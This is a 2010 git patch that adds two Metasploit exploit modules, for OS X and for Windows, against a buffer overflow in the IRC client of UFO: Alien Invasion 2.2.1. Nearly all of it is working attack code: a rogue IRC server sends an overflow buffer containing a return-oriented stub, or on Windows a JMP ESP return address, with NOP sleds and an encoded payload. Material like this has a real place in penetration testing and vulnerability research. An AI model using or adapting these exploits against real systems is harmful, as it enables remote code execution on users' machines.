From c1c64e5bc06d42e1614b259bb43fb765f06d3795 Mon Sep 17 00:00:00 2001 From: Joshua Drake Date: Thu, 1 Jul 2010 19:54:48 +0000 Subject: [PATCH] add exploits from dookie for ufo alian invasion on osx/windows git-svn-id: file:///home/svn/framework3/trunk@9643 4d416f70-5f16-0410-b530-b9f4589650da --- modules/exploits/osx/misc/ufo_ai.rb | 119 ++++++++++++++++++++++++ modules/exploits/windows/misc/ufo_ai.rb | 78 ++++++++++++++++ 2 files changed, 197 insertions(+) create mode 100644 modules/exploits/osx/misc/ufo_ai.rb create mode 100644 modules/exploits/windows/misc/ufo_ai.rb diff --git a/modules/exploits/osx/misc/ufo_ai.rb b/modules/exploits/osx/misc/ufo_ai.rb new file mode 100644 index 0000000000..160cbf6a74 --- /dev/null +++ b/modules/exploits/osx/misc/ufo_ai.rb @@ -0,0 +1,119 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = AverageRanking + + include Exploit::Remote::TcpServer + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'UFO: Alien Invasion IRC Client Buffer Overflow Exploit', + 'Description' => %q{ + This module exploits a buffer overflow in the IRC client component + of UFO: Alien Invasion 2.2.1. + }, + 'Author' => + [ + 'Jason Geffner', # Original Windows PoC Author + 'dookie' # OSX Exploit Author + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'OSVDB', '65689' ], + [ 'URL', 'http://www.exploit-db.com/exploits/14013' ] + ], + 'Payload' => + { + 'Space' => 400, + 'BadChars' => "\x00\x0a\x0d", + 'MaxNops' => 0, + 'StackAdjustment' => -3500, + }, + 'Platform' => 'osx', + 'Targets' => + [ + [ 'Mac OS X 10.5.8 x86, UFOAI 2.2.1', + { + 'Arch' => ARCH_X86, + 'Offset' => 524, + 'Writable' => 0x8fe66448, # dyld __IMPORT + # The rest of these addresses are in dyld __TEXT + 'setjmp' => 0x8fe1cf38, + 'strdup' => 0x8fe210dc, + 'jmp_eax' => 0x8fe01041 + } + ] + ], + 'DefaultTarget' => 0)) + + register_options( + [ + OptPort.new('SRVPORT', [ true, "The IRC daemon port to listen on", 6667 ]), + ], self.class) + end + + + def make_exec_payload_from_heap_stub() + frag0 = + "\x90" + # nop + "\x58" + # pop eax + "\x61" + # popa + "\xc3" # ret + + frag1 = + "\x90" + # nop + "\x58" + # pop eax + "\x89\xe0" + # mov eax, esp + "\x83\xc0\x0c" + # add eax, byte +0xc + "\x89\x44\x24\x08" + # mov [esp+0x8], eax + "\xc3" # ret + + setjmp = target['setjmp'] + writable = target['Writable'] + strdup = target['strdup'] + jmp_eax = target['jmp_eax'] + + exec_payload_from_heap_stub = + frag0 + + [setjmp].pack('V') + + [writable + 32, writable].pack("V2") + + frag1 + + "X" * 20 + + [setjmp].pack('V') + + [writable + 24, writable, strdup, jmp_eax].pack("V4") + + "X" * 4 + end + + + def on_client_connect(client) + + print_status("Got client connection...") + + offset = target['Offset'] + + buffer = "001 :" + buffer << rand_text_alpha_upper(offset) + buffer << make_exec_payload_from_heap_stub() + buffer << make_nops(16) + buffer << payload.encoded + buffer << "\x0d\x0a" + + print_status("Sending exploit to #{client.peerhost}:#{client.peerport}...") + client.put(buffer) + + end + +end diff --git a/modules/exploits/windows/misc/ufo_ai.rb b/modules/exploits/windows/misc/ufo_ai.rb new file mode 100644 index 0000000000..055e278c63 --- /dev/null +++ b/modules/exploits/windows/misc/ufo_ai.rb @@ -0,0 +1,78 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = AverageRanking + + include Exploit::Remote::TcpServer + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'UFO: Alien Invasion IRC Client Buffer Overflow Exploit', + 'Description' => %q{ + This module exploits a buffer overflow in the IRC client component of + UFO: Alien Invasion 2.2.1. + }, + 'Author' => + [ + 'Jason Geffner', # Original Windows PoC Author + 'dookie' # MSF Module Author + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'OSVDB', '65689'], + [ 'URL', 'http://www.exploit-db.com/exploits/14013' ] + ], + 'Payload' => + { + 'Space' => 400, + 'BadChars' => "\x00\x0a\x0d", + 'MaxNops' => 0, + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP Universal', { 'Ret' => 0x0AE59A43 } ], # JMP ESP in SDL_ttf.dll + ], + 'DefaultTarget' => 0)) + + register_options( + [ + OptPort.new('SRVPORT', [ true, "The IRC daemon port to listen on", 6667 ]), + ], self.class) + + end + + def on_client_connect(client) + + return if ((p = regenerate_payload(client)) == nil) + + print_status("Got client connection...") + + buffer = "001 :" + buffer << rand_text_alpha_upper(552) + buffer << [ target.ret ].pack('V') + buffer << make_nops(8) + buffer << payload.encoded + buffer << "\x0d\x0a" + + print_status("Sending exploit to #{client.peerhost}:#{client.peerport}...") + + client.put(buffer) + + end + +end